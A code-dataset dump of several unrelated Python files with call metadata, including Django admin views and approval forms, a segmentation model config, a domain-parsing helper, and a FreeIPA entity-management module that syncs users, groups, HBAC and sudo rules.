230, 59): 'number'}, {}), '(number)', False, 'from core.billing import get_prefix_from_number\n'), ((238, 22, 238, 45), 'random.randint', 'random.randint', ({(238, 37, 238, 38): '1', (238, 40, 238, 44): '5000'}, {}), '(1, 5000)', False, 'import 
random\n'), ((246, 22, 246, 47), 'random.randint', 'random.randint', ({(246, 37, 246, 40): '100', (246, 42, 246, 46): '5000'}, {}), '(100, 5000)', False, 'import random\n'), ((247, 19, 247, 41), 'random.randint', 'random.randint', ({(247, 34, 247, 35): '1', (247, 37, 247, 40): '100'}, {}), '(1, 100)', False, 'import random\n'), ((276, 26, 276, 75), 'core.billing.round_to_billable_unit', 'round_to_billable_unit', ({(276, 49, 276, 56): 'billsec', (276, 58, 276, 62): 'rate', (276, 64, 276, 68): 'free', (276, 70, 276, 74): 'unit'}, {}), '(billsec, rate, free, unit)', False, 'from core.billing import round_to_billable_unit\n'), ((242, 29, 242, 68), 'core.billing.round_to_billable_unit', 'round_to_billable_unit', ({(242, 52, 242, 59): 'billsec', (242, 61, 242, 67): 'TARIFF'}, {}), '(billsec, TARIFF)', False, 'from core.billing import round_to_billable_unit\n'), ((252, 29, 252, 74), 'core.billing.round_to_billable_unit', 'round_to_billable_unit', ({(252, 52, 252, 59): 'billsec', (252, 61, 252, 67): 'TARIFF', (252, 69, 252, 73): 'free'}, {}), '(billsec, TARIFF, free)', False, 'from core.billing import round_to_billable_unit\n'), ((289, 32, 289, 58), 'core.billing.round_up_to_nearest_100', 'round_up_to_nearest_100', ({(289, 56, 289, 57): 'i'}, {}), '(i)', False, 'from core.billing import round_up_to_nearest_100\n'), ((294, 29, 294, 55), 'core.billing.round_up_to_nearest_100', 'round_up_to_nearest_100', ({(294, 53, 294, 54): 'i'}, {}), '(i)', False, 'from core.billing import round_up_to_nearest_100\n')] |
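Taken together, the rounding tests pin down the expected arithmetic. The function below is not the project's implementation, only a small model consistent with the table in test_billable_unit_rounding_with_units (the name is made up):

import math

def billable_unit_model(billsec, rate_per_min, free_seconds=0, unit=1):
    # bill whole units beyond the free allowance, at rate_per_min per 60 seconds
    chargeable = max(billsec - free_seconds, 0)
    billed_seconds = int(math.ceil(chargeable / float(unit))) * unit
    return int(billed_seconds * (rate_per_min / 60.0))

assert billable_unit_model(61, 72, 0, 30) == 108
assert billable_unit_model(61, 60, 10, 60) == 60
assert billable_unit_model(0, 60, 0, 30) == 0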
s-i-l-k-e/django-data-interrogator | data_interrogator/admin/views.py | 0284168b81aaa31a8df84f3ea52166eded8a4362 | from django.contrib.auth.decorators import user_passes_test
from django.utils.decorators import method_decorator
from data_interrogator.admin.forms import AdminInvestigationForm, AdminPivotTableForm
from data_interrogator.interrogators import Allowable
from data_interrogator.views import InterrogationView, InterrogationAutocompleteUrls, PivotTableView, \
InterrogationAutoComplete
class AdminInterrogationRoom(InterrogationView):
template_name = 'admin/analytics/analytics.html'
form_class = AdminInvestigationForm
report_models = Allowable.ALL_MODELS
allowed = Allowable.ALL_APPS
excluded = []
@method_decorator(user_passes_test(lambda u: u.is_superuser))
def get(self, request):
return super(AdminInterrogationRoom,self).get(request)
class AdminInterrogationAutocompleteUrls(InterrogationAutocompleteUrls):
interrogator_view_class = AdminInterrogationRoom
interrogator_autocomplete_class = InterrogationAutoComplete
class AdminPivotTableView(PivotTableView):
form_class = AdminPivotTableForm
template_name = 'admin/analytics/pivot.html'
| [((18, 22, 18, 64), 'django.contrib.auth.decorators.user_passes_test', 'user_passes_test', ({(18, 39, 18, 63): '(lambda u: u.is_superuser)'}, {}), '(lambda u: u.is_superuser)', False, 'from django.contrib.auth.decorators import user_passes_test\n')] |
heytanay/mmsegmentation | configs/pspnet/pspnet_r18-d8_512x512_80k_loveda.py | 7ddd2fe2ecff9c95999bd00ec05cc37eafb558f8 | _base_ = './pspnet_r50-d8_512x512_80k_loveda.py'
model = dict(
backbone=dict(
depth=18,
init_cfg=dict(
type='Pretrained', checkpoint='open-mmlab://resnet18_v1c')),
decode_head=dict(
in_channels=512,
channels=128,
),
auxiliary_head=dict(in_channels=256, channels=64))
| [] |
TheGenocides/BBA | bba/objects.py | 1617756ed9224027d7225ea68364f6568c56ed23 | from typing import Dict, Any
class ResponseObject:
def __init__(self, data: Dict[str, Any]):
self.payload = data
for k, v in data.items():
setattr(self, k, v) | [] |
BR0kEN-/admin-portal | apps/greencheck/forms.py | 0c38dc0d790031f45bf07660bce690e972fe2858 | from django import forms
from django.forms import ModelForm
from django.contrib.auth import get_user_model
from django.core.exceptions import ValidationError
from .choices import ActionChoice
from .choices import StatusApproval
from .models import GreencheckIp
from .models import GreencheckIpApprove
from .models import GreencheckASN, GreencheckASNapprove
User = get_user_model()
class ApprovalMixin:
ApprovalModel = None
def _save_approval(self):
"""
        Save the approval request, be it an IP Range or an AS Network,
        for the hosting provider attached to this form's instance.
"""
if self.ApprovalModel is None:
raise NotImplementedError("Approval model missing")
model_name = self.ApprovalModel._meta.model_name
if not self.cleaned_data["is_staff"]:
hosting_provider = self.instance.hostingprovider
            # `changed` here indicates an update to an existing entry rather than a brand new one
action = ActionChoice.update if self.changed else ActionChoice.new
status = StatusApproval.update if self.changed else StatusApproval.new
kwargs = {
"action": action,
"status": status,
"hostingprovider": hosting_provider,
}
if model_name == "greencheckasnapprove":
self.instance = GreencheckASNapprove(asn=self.instance.asn, **kwargs)
else:
self.instance = GreencheckIpApprove(
ip_end=self.instance.ip_end,
ip_start=self.instance.ip_start,
**kwargs
)
hosting_provider.mark_as_pending_review(self.instance)
def clean_is_staff(self):
try:
# when using this form `is_staff` should always be available
# or else something has gone wrong...
return self.data["is_staff"]
except KeyError:
raise ValidationError("Alert staff: a bug has occurred.")
class GreencheckAsnForm(ModelForm, ApprovalMixin):
ApprovalModel = GreencheckASNapprove
is_staff = forms.BooleanField(
label="user_is_staff", required=False, widget=forms.HiddenInput()
)
class Meta:
model = GreencheckASN
fields = (
"active",
"asn",
)
def save(self, commit=True):
self._save_approval()
        return super().save(commit=commit)
class GreencheckIpForm(ModelForm, ApprovalMixin):
    """This form is meant for the admin.
    If a non-staff user fills in the form, it will return
    an unsaved approval record instead of a GreencheckIp record.
"""
ApprovalModel = GreencheckIpApprove
is_staff = forms.BooleanField(
label="user_is_staff", required=False, widget=forms.HiddenInput()
)
class Meta:
model = GreencheckIp
fields = (
"active",
"ip_start",
"ip_end",
)
def save(self, commit=True):
"""
If a non-staff user creates an ip, instead of saving
the ip record directly, it will save an approval record.
Only when it has been approved the record will actually
be created.
So we return an approval instance instead of Greencheck instance
which in turn will get saved a bit later.
"""
self._save_approval()
return super().save(commit=commit)
class GreencheckAsnApprovalForm(ModelForm):
class Meta:
model = GreencheckASNapprove
fields = ("action", "asn", "status")
def save(self, commit=True):
instance = self.instance.greencheck_asn
if commit is True:
if instance:
instance.asn = self.instance.asn
instance.save()
else:
instance = GreencheckASN.objects.create(
active=True,
asn=self.instance.asn,
hostingprovider=self.instance.hostingprovider,
)
self.instance.greencheck_asn = instance
return super().save(commit=commit)
class GreecheckIpApprovalForm(ModelForm):
field_order = ("ip_start", "ip_end")
class Meta:
model = GreencheckIpApprove
fields = "__all__"
def save(self, commit=True):
ip_instance = self.instance.greencheck_ip
if commit is True:
if ip_instance:
ip_instance.ip_end = self.instance.ip_end
                ip_instance.ip_start = self.instance.ip_start
ip_instance.save()
else:
ip_instance = GreencheckIp.objects.create(
active=True,
ip_end=self.instance.ip_end,
ip_start=self.instance.ip_start,
hostingprovider=self.instance.hostingprovider,
)
self.instance.greencheck_ip = ip_instance
return super().save(commit=commit)
| [((12, 7, 12, 23), 'django.contrib.auth.get_user_model', 'get_user_model', ({}, {}), '()', False, 'from django.contrib.auth import get_user_model\n'), ((63, 54, 63, 73), 'django.forms.HiddenInput', 'forms.HiddenInput', ({}, {}), '()', False, 'from django import forms\n'), ((87, 54, 87, 73), 'django.forms.HiddenInput', 'forms.HiddenInput', ({}, {}), '()', False, 'from django import forms\n'), ((56, 18, 56, 69), 'django.core.exceptions.ValidationError', 'ValidationError', ({(56, 34, 56, 68): '"""Alert staff: a bug has occurred."""'}, {}), "('Alert staff: a bug has occurred.')", False, 'from django.core.exceptions import ValidationError\n')] |
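From a view's perspective the forms above behave roughly as follows; the request wiring is assumed here and is not part of this file:

form = GreencheckIpForm(data={"active": True, "ip_start": "192.0.2.1",
                              "ip_end": "192.0.2.10",
                              "is_staff": request.user.is_staff})
if form.is_valid():
    record = form.save()
    # staff submissions keep the GreencheckIp instance; non-staff submissions are
    # swapped for a GreencheckIpApprove left pending review for the hosting provider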
think-wang/osroom | apps/utils/format/url_format.py | 67bb5bbd7a63fbaeb0d919738859444b54500152 | #!/usr/bin/env python
# -*-coding:utf-8-*-
from tld import get_tld
__author__ = "Allen Woo"
def get_domain(url):
'''
    Get the full domain name from the URL.
:param url:
:return:
'''
res = get_tld(url, as_object=True)
return "{}.{}".format(res.subdomain, res.tld) | [((13, 10, 13, 38), 'tld.get_tld', 'get_tld', (), '', False, 'from tld import get_tld\n')] |
Tjev/freeipa-manager | ipamanager/entities.py | 0d40e64d81a86d4312b4e22cd57dcaecf25d0801 | #!/usr/bin/env python
# -*- coding: utf-8 -*-
# SPDX-License-Identifier: BSD-3-Clause
# Copyright © 2017-2019, GoodData Corporation. All rights reserved.
"""
FreeIPA Manager - entity module
Object representations of the entities configured in FreeIPA.
"""
import os
import re
import voluptuous
import yaml
from abc import ABCMeta, abstractproperty
import schemas
from command import Command
from core import FreeIPAManagerCore
from errors import ConfigError, ManagerError, IntegrityError
class FreeIPAEntity(FreeIPAManagerCore):
"""
General FreeIPA entity (user, group etc.) representation.
Can only be used via subclasses, not directly.
"""
__metaclass__ = ABCMeta
    entity_id_type = 'cn'  # entity name identifier in FreeIPA
key_mapping = {} # attribute name mapping between local config and FreeIPA
ignored = [] # list of ignored entities for each entity type
allowed_members = []
def __init__(self, name, data, path=None):
"""
:param str name: entity name (user login, group name etc.)
:param dict data: dictionary of entity configuration values
:param str path: path to file the entity was parsed from;
if None, indicates creation of entity from FreeIPA
"""
super(FreeIPAEntity, self).__init__()
if not data: # may be None; we want to ensure dictionary
data = dict()
self.name = name
self.path = path
self.metaparams = data.pop('metaparams', dict())
if self.path: # created from local config
try:
self.validation_schema(data)
except voluptuous.Error as e:
raise ConfigError('Error validating %s: %s' % (name, e))
if not path.endswith('.yaml'): # created from template tool
path, name = os.path.split(self.path)
self.path = '%s.yaml' % os.path.join(
path, name.replace('-', '_'))
self.data_ipa = self._convert_to_ipa(data)
self.data_repo = data
else: # created from FreeIPA
self.data_ipa = data
self.data_repo = self._convert_to_repo(data)
def _convert_to_ipa(self, data):
"""
Convert entity data to IPA format.
:param dict data: entity data in repository format
:returns: dictionary of data in IPA format
:rtype: dict
"""
result = dict()
for key, value in data.iteritems():
new_key = self.key_mapping.get(key, key).lower()
if new_key == 'memberof':
self._check_memberof(value)
result[new_key] = value
elif isinstance(value, bool):
result[new_key] = value
elif isinstance(value, list):
result[new_key] = tuple(unicode(i) for i in value)
else:
result[new_key] = (unicode(value),)
return result
def _convert_to_repo(self, data):
"""
Convert entity data to repo format.
:param dict data: entity data in IPA format
:returns: dictionary of data in repository format
:rtype: dict
"""
result = dict()
for attr in self.managed_attributes_pull:
if attr.lower() in data:
key = attr
# find reverse (IPA -> repo) attribute name mapping
for k, v in self.key_mapping.iteritems():
if v == attr:
key = k
break
value = data[attr.lower()]
if isinstance(value, tuple):
if len(value) > 1:
result[key] = list(value)
else:
result[key] = value[0]
else:
result[key] = value
return result
def _check_memberof(self, member_of):
for entity_type in member_of:
try:
self.get_entity_class(entity_type)
except KeyError:
raise ConfigError(
'Cannot be a member of non-existent entity type %s'
% entity_type)
def create_commands(self, remote_entity=None):
"""
Create commands to execute in order
to sync entity with its FreeIPA counterpart.
:param FreeIPAEntity remote_entity: remote entity
:returns: list of Command objects to execute
:rtype: list(Command)
"""
diff = dict()
for key in self.managed_attributes_push:
local_value = self.data_ipa.get(key.lower(), ())
if not remote_entity:
if local_value:
diff[key.lower()] = local_value
else:
remote_value = remote_entity.data_ipa.get(key.lower(), ())
if sorted(local_value) != sorted(remote_value):
diff[key.lower()] = local_value
if diff or not remote_entity: # create entity even without params
if remote_entity: # modify existing entity
command = '%s_mod' % self.entity_name
else: # add new entity
command = '%s_add' % self.entity_name
return [Command(command, diff, self.name, self.entity_id_type)]
return []
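    # Illustration (hypothetical data, not from the codebase): for a local user
    # 'jdoe' whose 'mail' differs from the remote entry, the loop above collects
    # {'mail': (u'[email protected]',)} and a single Command('user_mod', ...) is
    # returned, built with the entity's id type; with no remote counterpart the
    # same diff is issued as 'user_add' instead.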
def update_repo_data(self, additional):
"""
Update repo-format data with additional attributes.
Used for adding membership attributes to data.
:param dict additional: dictionary to update entity data with
:rtype: None
"""
self.data_repo.update(additional or {})
def normalize(self):
"""
Re-structure entity's data in such a way that it can be stored
into the configuration file in a normalized format. This is used
when round-trip loading and saving a configuration.
"""
memberof = self.data_repo.pop('memberOf', None)
if memberof:
for target_type, target_list in memberof.iteritems():
memberof[target_type] = sorted(target_list)
self.data_repo['memberOf'] = memberof
def write_to_file(self):
if not self.path:
raise ManagerError(
'%s has no file path, nowhere to write.' % repr(self))
if self.metaparams:
self.data_repo.update({'metaparams': self.metaparams})
# don't write default attributes into file
for key in self.default_attributes:
self.data_repo.pop(key, None)
try:
with open(self.path, 'w') as target:
data = {self.name: self.data_repo or None}
yaml.dump(data, stream=target, Dumper=EntityDumper,
default_flow_style=False, explicit_start=True)
self.lg.debug('%s written to file', repr(self))
except (IOError, OSError, yaml.YAMLError) as e:
raise ConfigError(
'Cannot write %s to %s: %s' % (repr(self), self.path, e))
def delete_file(self):
if not self.path:
raise ManagerError(
'%s has no file path, cannot delete.' % repr(self))
try:
os.unlink(self.path)
self.lg.debug('%s config file deleted', repr(self))
except OSError as e:
raise ConfigError(
'Cannot delete %s at %s: %s' % (repr(self), self.path, e))
@staticmethod
def get_entity_class(name):
for entity_class in [
FreeIPAHBACRule, FreeIPAHBACService,
FreeIPAHBACServiceGroup, FreeIPAHostGroup, FreeIPAPermission,
FreeIPAPrivilege, FreeIPARole, FreeIPAService,
FreeIPASudoRule, FreeIPAUser, FreeIPAUserGroup]:
if entity_class.entity_name == name:
return entity_class
raise KeyError(name)
@abstractproperty
def validation_schema(self):
"""
:returns: entity validation schema
:rtype: voluptuous.Schema
"""
@abstractproperty
def managed_attributes_push(self):
"""
Return a list of properties that are managed for given entity type
when pushing configuration from local repo to FreeIPA.
NOTE: the list should NOT include attributes that are managed via
separate commands, like memberOf/memberHost/memberUser or ipasudoopt.
:returns: list of entity's managed attributes
:rtype: list(str)
"""
@property
def managed_attributes_pull(self):
"""
        Return a list of properties that are managed for given entity type
when pulling configuration from FreeIPA to local repository.
:returns: list of entity's managed attributes
:rtype: list(str)
"""
return self.managed_attributes_push
@property
def default_attributes(self):
"""
Return a list of default attributes for each entity of the given type.
These attributes will not be written into the YAML file when pulling.
:returns: list of entity's attributes that have single default value
:rtype: list(str)
"""
return []
def __repr__(self):
return '%s %s' % (self.entity_name, self.name)
def __str__(self):
return self.name
def __eq__(self, other):
return type(self) is type(other) and self.name == other.name
def __ne__(self, other):
return not (self == other)
def __gt__(self, other):
return self.name > other.name
def __lt__(self, other):
return self.name < other.name
class FreeIPAGroup(FreeIPAEntity):
    """Abstract representation of a FreeIPA group entity (host/user group)."""
managed_attributes_push = ['description']
@abstractproperty
def allowed_members(self):
"""
:returns: list of entity types that can be members of this entity
:rtype: list(FreeIPAEntity)
"""
class FreeIPAHostGroup(FreeIPAGroup):
"""Representation of a FreeIPA host group entity."""
entity_name = 'hostgroup'
allowed_members = ['hostgroup']
validation_schema = voluptuous.Schema(schemas.schema_hostgroups)
class FreeIPAUserGroup(FreeIPAGroup):
"""Representation of a FreeIPA user group entity."""
entity_name = 'group'
managed_attributes_pull = ['description', 'posix']
allowed_members = ['user', 'group']
validation_schema = voluptuous.Schema(schemas.schema_usergroups)
def __init__(self, name, data, path=None):
"""
:param str name: entity name (user login, group name etc.)
:param dict data: dictionary of entity configuration values
:param str path: path to file the entity was parsed from;
if None, indicates creation of entity from FreeIPA
"""
if not path: # entity created from FreeIPA, not from config
data['posix'] = u'posixgroup' in data.get(u'objectclass', [])
super(FreeIPAUserGroup, self).__init__(name, data, path)
self.posix = self.data_repo.get('posix', True)
def can_contain_users(self, pattern):
"""
Check whether the group can contain users directly.
If the pattern is None, no restrictions are applied.
:param str pattern: regex to check name by (not enforced if empty)
"""
return not pattern or re.match(pattern, self.name)
def cannot_contain_users(self, pattern):
"""
Check whether the group can not contain users directly.
Used for determining if the group can be a member of a sudo/HBAC rule.
If the pattern is None, no restrictions are applied.
:param str pattern: regex to check name by (not enforced if empty)
"""
return not pattern or not re.match(pattern, self.name)
def _process_posix_setting(self, remote_entity):
posix_diff = dict()
description = None
if remote_entity:
if self.posix and not remote_entity.posix:
posix_diff = {u'posix': True}
description = 'group_mod %s (make POSIX)' % self.name
elif not self.posix and remote_entity.posix:
posix_diff = {'setattr': (u'gidnumber=',),
'delattr': (u'objectclass=posixgroup',)}
description = 'group_mod %s (make non-POSIX)' % self.name
elif not self.posix: # creation of new non-POSIX group
posix_diff = {u'nonposix': True}
return (posix_diff, description)
def create_commands(self, remote_entity=None):
"""
        Create commands to execute in order to update the group.
        Extends the basic command creation with POSIX/non-POSIX setting.
        :param dict remote_entity: remote group data
:returns: list of commands to execute
:rtype: list(Command)
"""
commands = super(FreeIPAUserGroup, self).create_commands(remote_entity)
posix_diff, description = self._process_posix_setting(remote_entity)
if posix_diff:
if not commands: # no diff but POSIX setting, new command needed
cmd = Command('group_mod', posix_diff,
self.name, self.entity_id_type)
cmd.description = description
return [cmd]
else: # update POSIX setting as part of existing command
commands[0].update(posix_diff)
return commands
class FreeIPAUser(FreeIPAEntity):
"""Representation of a FreeIPA user entity."""
entity_name = 'user'
entity_id_type = 'uid'
managed_attributes_push = ['givenName', 'sn', 'initials', 'mail',
'ou', 'manager', 'carLicense', 'title']
key_mapping = {
'emailAddress': 'mail',
'firstName': 'givenName',
'lastName': 'sn',
'organizationUnit': 'ou',
'githubLogin': 'carLicense'
}
validation_schema = voluptuous.Schema(schemas.schema_users)
class FreeIPARule(FreeIPAEntity):
"""Abstract class covering HBAC and sudo rules."""
def create_commands(self, remote_entity=None):
"""
Create commands to execute in order to update the rule.
Extends the basic command creation
to account for adding/removing rule members.
:param dict remote_entity: remote rule data
:returns: list of commands to execute
:rtype: list(Command)
"""
result = super(FreeIPARule, self).create_commands(remote_entity)
result.extend(self._process_rule_membership(remote_entity))
return result
def _process_rule_membership(self, remote_entity):
"""
Prepare a command for a hbac/sudo rule membership update.
If the rule previously had any members, these are removed
as a rule can only have one usergroup and one hostgroup as members.
:param FreeIPArule remote_entity: remote entity data (may be None)
"""
commands = []
for key, member_type, cmd_key in (
('memberhost', 'hostgroup', 'host'),
('memberuser', 'group', 'user'),
('memberservice', 'hbacsvc', 'service')):
local_members = set(self.data_ipa.get(key, []))
if remote_entity:
search_key = '%s_%s' % (key, member_type)
remote_members = set(
remote_entity.data_ipa.get(search_key, []))
else:
remote_members = set()
command = '%s_add_%s' % (self.entity_name, cmd_key)
for member in local_members - remote_members:
diff = {member_type: member}
commands.append(
Command(command, diff, self.name, self.entity_id_type))
command = '%s_remove_%s' % (self.entity_name, cmd_key)
for member in remote_members - local_members:
diff = {member_type: member}
commands.append(
Command(command, diff, self.name, self.entity_id_type))
return commands
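    # Example (hypothetical data): a local rule listing memberhost=('group-one',)
    # with no remote counterpart yields a single 'hbacrule_add_host' (or
    # 'sudorule_add_host') Command carrying {'hostgroup': 'group-one'}; members
    # present only on the remote side produce the matching *_remove_* commands.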
class FreeIPAHBACRule(FreeIPARule):
"""Representation of a FreeIPA HBAC (host-based access control) rule."""
entity_name = 'hbacrule'
default_attributes = ['serviceCategory']
managed_attributes_push = ['description', 'serviceCategory']
validation_schema = voluptuous.Schema(schemas.schema_hbac)
def __init__(self, name, data, path=None):
"""
Create a HBAC rule instance.
This override is needed to set the servicecat parameter.
"""
if path: # only edit local entities
if not data: # may be None; we want to ensure dictionary
data = dict()
if 'memberService' not in data:
data.update({'serviceCategory': 'all'})
elif 'serviceCategory' in data:
raise IntegrityError(
'%s cannot contain both memberService and serviceCategory'
% name)
super(FreeIPAHBACRule, self).__init__(name, data, path)
class FreeIPASudoRule(FreeIPARule):
"""Representation of a FreeIPA sudo rule."""
entity_name = 'sudorule'
default_attributes = [
'cmdCategory', 'options', 'runAsGroupCategory', 'runAsUserCategory']
managed_attributes_push = [
'cmdCategory', 'description',
'ipaSudoRunAsGroupCategory', 'ipaSudoRunAsUserCategory']
managed_attributes_pull = managed_attributes_push + ['ipaSudoOpt']
key_mapping = {
'options': 'ipaSudoOpt',
'runAsGroupCategory': 'ipaSudoRunAsGroupCategory',
'runAsUserCategory': 'ipaSudoRunAsUserCategory'
}
validation_schema = voluptuous.Schema(schemas.schema_sudo)
def __init__(self, name, data, path=None):
"""
Create a sudorule instance.
This override is needed to set the options & runAs params.
"""
if path: # only edit local entities
if not data: # may be None; we want to ensure dictionary
data = dict()
data.update({'options': ['!authenticate', '!requiretty'],
'cmdCategory': 'all',
'runAsUserCategory': 'all',
'runAsGroupCategory': 'all'})
super(FreeIPASudoRule, self).__init__(name, data, path)
def _convert_to_repo(self, data):
result = super(FreeIPASudoRule, self)._convert_to_repo(data)
if isinstance(result.get('options'), unicode):
result['options'] = [result['options']]
return result
def create_commands(self, remote_entity=None):
"""
Create commands to execute in order to update the rule.
Extends the basic command creation with sudorule option update.
:param dict remote_entity: remote rule data
:returns: list of commands to execute
:rtype: list(Command)
"""
result = super(FreeIPASudoRule, self).create_commands(remote_entity)
result.extend(self._parse_sudo_options(remote_entity))
return result
def _parse_sudo_options(self, remote_entity):
"""
Prepare commands for sudo rule options update. This includes
deletion of old options that are no longer in configuration
as well as addition of new options.
:param dict remote_entity: remote entity data (can be None)
:returns: list of sudorule option update commands to execute
:rtype: list(Command)
"""
commands = []
local_options = set(self.data_repo.get('options', []))
if remote_entity:
remote_options = set(remote_entity.data_ipa.get('ipasudoopt', []))
else:
remote_options = set()
command = 'sudorule_add_option'
for opt in local_options - remote_options:
diff = {'ipasudoopt': [opt]}
commands.append(
Command(command, diff, self.name, self.entity_id_type))
command = 'sudorule_remove_option'
for opt in remote_options - local_options:
diff = {'ipasudoopt': [opt]}
commands.append(
Command(command, diff, self.name, self.entity_id_type))
return commands
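    # Example (hypothetical data): local options ['!authenticate'] against a
    # remote ipasudoopt of ['!requiretty'] produce two commands, a
    # 'sudorule_add_option' with {'ipasudoopt': ['!authenticate']} and a
    # 'sudorule_remove_option' with {'ipasudoopt': ['!requiretty']}.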
class FreeIPAHBACService(FreeIPAEntity):
"""Entity to hold the info about FreeIPA HBACServices"""
entity_name = 'hbacsvc'
managed_attributes_push = ['description']
managed_attributes_pull = managed_attributes_push
validation_schema = voluptuous.Schema(schemas.schema_hbacservices)
class FreeIPAHBACServiceGroup(FreeIPAEntity):
"""Entity to hold the info about FreeIPA HBACServiceGroups"""
entity_name = 'hbacsvcgroup'
managed_attributes_push = ['description']
managed_attributes_pull = managed_attributes_push
allowed_members = ['hbacsvc']
validation_schema = voluptuous.Schema(schemas.schema_hbacsvcgroups)
class FreeIPARole(FreeIPAEntity):
"""Entity to hold the info about FreeIPA Roles"""
entity_name = 'role'
managed_attributes_pull = ['description']
managed_attributes_push = managed_attributes_pull
allowed_members = ['user', 'group', 'service', 'hostgroup']
validation_schema = voluptuous.Schema(schemas.schema_roles)
class FreeIPAPrivilege(FreeIPAEntity):
"""Entity to hold the info about FreeIPA Privilege"""
entity_name = 'privilege'
managed_attributes_pull = ['description']
managed_attributes_push = managed_attributes_pull
allowed_members = ['role']
validation_schema = voluptuous.Schema(schemas.schema_privileges)
class FreeIPAPermission(FreeIPAEntity):
"""Entity to hold the info about FreeIPA Permission"""
entity_name = 'permission'
managed_attributes_pull = ['description', 'subtree', 'attrs',
'ipapermlocation', 'ipapermright',
'ipapermdefaultattr']
managed_attributes_push = managed_attributes_pull
key_mapping = {
'grantedRights': 'ipapermright',
'attributes': 'attrs',
'location': 'ipapermlocation',
'defaultAttr': 'ipapermdefaultattr'
}
allowed_members = ['privilege']
validation_schema = voluptuous.Schema(schemas.schema_permissions)
class FreeIPAService(FreeIPAEntity):
"""
Entity to hold the info about FreeIPA Services
PUSH NOT SUPPORTED yet
"""
entity_name = 'service'
entity_id_type = 'krbcanonicalname'
managed_attributes_push = [] # Empty because we don't support push
managed_attributes_pull = ['managedby_host', 'description']
key_mapping = {
'managedBy': 'managedby_host',
}
validation_schema = voluptuous.Schema(schemas.schema_services)
def write_to_file(self):
"""
Converts the file name format from xyz/hostname.int.na.intgdc.com
to xyz-hostname_int_na_intgdc_com.yaml
"""
path, file_name = os.path.split(self.path)
service_name, _ = file_name.split('@')
self.path = ('%s-%s.yaml' % (path, service_name.replace('.', '_')))
super(FreeIPAService, self).write_to_file()
class EntityDumper(yaml.SafeDumper):
"""YAML dumper subclass used to fix under-indent of lists when dumping."""
def __init__(self, *args, **kwargs):
super(EntityDumper, self).__init__(*args, **kwargs)
self.add_representer(type(None), self._none_representer())
def increase_indent(self, flow=False, indentless=False):
return super(EntityDumper, self).increase_indent(flow, False)
def _none_representer(self):
"""
Enable correct representation of empty values in config
by representing None as empty string instead of 'null'.
"""
def representer(dumper, value):
return dumper.represent_scalar(u'tag:yaml.org,2002:null', '')
return representer
| [((279, 24, 279, 68), 'voluptuous.Schema', 'voluptuous.Schema', ({(279, 42, 279, 67): 'schemas.schema_hostgroups'}, {}), '(schemas.schema_hostgroups)', False, 'import voluptuous\n'), ((287, 24, 287, 68), 'voluptuous.Schema', 'voluptuous.Schema', ({(287, 42, 287, 67): 'schemas.schema_usergroups'}, {}), '(schemas.schema_usergroups)', False, 'import voluptuous\n'), ((367, 24, 367, 63), 'voluptuous.Schema', 'voluptuous.Schema', ({(367, 42, 367, 62): 'schemas.schema_users'}, {}), '(schemas.schema_users)', False, 'import voluptuous\n'), ((423, 24, 423, 62), 'voluptuous.Schema', 'voluptuous.Schema', ({(423, 42, 423, 61): 'schemas.schema_hbac'}, {}), '(schemas.schema_hbac)', False, 'import voluptuous\n'), ((456, 24, 456, 62), 'voluptuous.Schema', 'voluptuous.Schema', ({(456, 42, 456, 61): 'schemas.schema_sudo'}, {}), '(schemas.schema_sudo)', False, 'import voluptuous\n'), ((523, 24, 523, 70), 'voluptuous.Schema', 'voluptuous.Schema', ({(523, 42, 523, 69): 'schemas.schema_hbacservices'}, {}), '(schemas.schema_hbacservices)', False, 'import voluptuous\n'), ((532, 24, 532, 71), 'voluptuous.Schema', 'voluptuous.Schema', ({(532, 42, 532, 70): 'schemas.schema_hbacsvcgroups'}, {}), '(schemas.schema_hbacsvcgroups)', False, 'import voluptuous\n'), ((541, 24, 541, 63), 'voluptuous.Schema', 'voluptuous.Schema', ({(541, 42, 541, 62): 'schemas.schema_roles'}, {}), '(schemas.schema_roles)', False, 'import voluptuous\n'), ((550, 24, 550, 68), 'voluptuous.Schema', 'voluptuous.Schema', ({(550, 42, 550, 67): 'schemas.schema_privileges'}, {}), '(schemas.schema_privileges)', False, 'import voluptuous\n'), ((567, 24, 567, 69), 'voluptuous.Schema', 'voluptuous.Schema', ({(567, 42, 567, 68): 'schemas.schema_permissions'}, {}), '(schemas.schema_permissions)', False, 'import voluptuous\n'), ((582, 24, 582, 66), 'voluptuous.Schema', 'voluptuous.Schema', ({(582, 42, 582, 65): 'schemas.schema_services'}, {}), '(schemas.schema_services)', False, 'import voluptuous\n'), ((589, 26, 589, 50), 'os.path.split', 'os.path.split', ({(589, 40, 589, 49): 'self.path'}, {}), '(self.path)', False, 'import os\n'), ((189, 12, 189, 32), 'os.unlink', 'os.unlink', ({(189, 22, 189, 31): 'self.path'}, {}), '(self.path)', False, 'import os\n'), ((307, 30, 307, 58), 're.match', 're.match', ({(307, 39, 307, 46): 'pattern', (307, 48, 307, 57): 'self.name'}, {}), '(pattern, self.name)', False, 'import re\n'), ((53, 29, 53, 53), 'os.path.split', 'os.path.split', ({(53, 43, 53, 52): 'self.path'}, {}), '(self.path)', False, 'import os\n'), ((141, 20, 141, 74), 'command.Command', 'Command', ({(141, 28, 141, 35): 'command', (141, 37, 141, 41): 'diff', (141, 43, 141, 52): 'self.name', (141, 54, 141, 73): 'self.entity_id_type'}, {}), '(command, diff, self.name, self.entity_id_type)', False, 'from command import Command\n'), ((177, 16, 178, 72), 'yaml.dump', 'yaml.dump', (), '', False, 'import yaml\n'), ((316, 34, 316, 62), 're.match', 're.match', ({(316, 43, 316, 50): 'pattern', (316, 52, 316, 61): 'self.name'}, {}), '(pattern, self.name)', False, 'import re\n'), ((345, 22, 346, 61), 'command.Command', 'Command', ({(345, 30, 345, 41): '"""group_mod"""', (345, 43, 345, 53): 'posix_diff', (346, 30, 346, 39): 'self.name', (346, 41, 346, 60): 'self.entity_id_type'}, {}), "('group_mod', posix_diff, self.name, self.entity_id_type)", False, 'from command import Command\n'), ((509, 16, 509, 70), 'command.Command', 'Command', ({(509, 24, 509, 31): 'command', (509, 33, 509, 37): 'diff', (509, 39, 509, 48): 'self.name', (509, 50, 509, 69): 'self.entity_id_type'}, 
